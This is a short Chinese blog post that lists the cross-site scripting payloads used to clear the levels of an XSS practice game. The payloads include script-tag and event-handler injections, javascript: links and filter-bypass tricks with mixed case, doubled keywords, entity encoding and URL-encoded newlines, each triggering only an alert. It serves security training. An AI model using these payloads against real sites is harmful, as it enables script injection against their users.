xss的语句

2018-10-05  ⋅   web安全   xss  

这是一个xss的闯关游戏

下载链接:
提取码: isre

xss的语句

1
<script>alert(/xss/)</script>
2
"><script>alert(/xss/)</script>

3

'onmouseover='alert(/xss/)'

4
" oninput=alert`xss`//
" onfocus=alert`xss` autofocus= "
" onchange=alert`xss` "


<img src=x onerror=alert(/xss/)>

5

"><a href=javascript:alert(/xss/)>

6
"><A HREF=javascript:alert(/xss/)>

7
"><scrscriptipt>alert(/xss/)</scscriptript>

8
html 字符实体编码转换
java&#x73;cript:alert(1)

9
java&#x73;cript:alert(1)/*http://*/

10
&t_sort=a" onclick="alert(1)"

15
urlencode
%0a%0d
<img%0asrc=xx%0aonerror=alert(/xss/)>

xss_payload

评论系统未开启,无法评论!

  1. LINKS